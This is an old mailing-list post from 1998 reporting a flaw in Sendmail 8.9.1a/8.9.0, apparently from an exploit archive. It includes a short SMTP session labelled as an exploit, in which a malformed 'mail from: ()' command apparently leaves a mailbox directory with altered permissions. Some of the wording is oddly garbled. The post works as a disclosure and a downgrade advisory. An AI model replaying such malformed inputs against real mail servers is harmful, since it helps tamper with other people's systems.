sendmail.8.9.1-2.txt

`Date: Thu, 24 Sep 1998 10:14:06 -0400  
From: Simon Smith <[email protected]>  
  
This is not the same attack as the last one regarding the "(".  
This one does not make your system hang but rather alters permissions is  
seems. If this was already posted please disregard it.  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
Be conscious that Sendmail 8.9.1a/8.9.0 has a critical security  
flaw in it. I have tested this on debain Linux. I have not had time to  
hack the source and find out where the hole is. (Yes I am going to give  
notice to sendmail.) I have not determined if other systems are open to  
this attack, but to check, create a user that you can eliminate.  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
begin exploit  
  
*****  
bogin:~$ telnet localhost 25  
Trying 127.0.0.1...  
Connected to localhost.  
Escape character is '^]'.  
220 host.com ESMTP Sendmail 8.9.1a/8.9.0; Thu, 24 Sep 1998 09:44:23 -0400  
mail from: ()  
250 MAILER-DAEMON... Sender ok  
rcpt to: tester  
250 tester... Recipient ok  
data  
354 Enter mail, end with "." on a line by itself  
bababababa  
.250 JAA15070 Message accepted for delivery  
quit  
221 bogin.ma.ultranet.com closing connection  
Connection closed by foreign host.  
bogin:~$ su - tester  
Password:  
bogin:~$ pine  
*****  
  
end exploit  
  
That is not the least of it. The mail was sent to tester, but watch what  
happens if I read the mail,  
then use pine to check e-mail.  
  
I get the following message inside of pine:  
"Mailbox vulnerable - directory must have 1777 protection "  
  
Down grading to an preliminary version of sendmail will stop this from  
happening to you (8.8.8). If someone was to transmit mail to  
[email protected] you would be condemned.  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
  
  
  
Hmmm it was not like that before.  
  
I am still able to read the email.. but this causes problems..  
  
  
I apologize that I did not take this any farther. If anyone wants to dig  
into this please notify me of your findings  
  
  
Sincerely,  
SIMON  
  
p.s. if this is an old bug please tell me and forward me the details...  
not sure how it could be though seing as it is the alpha release.... =oP  
`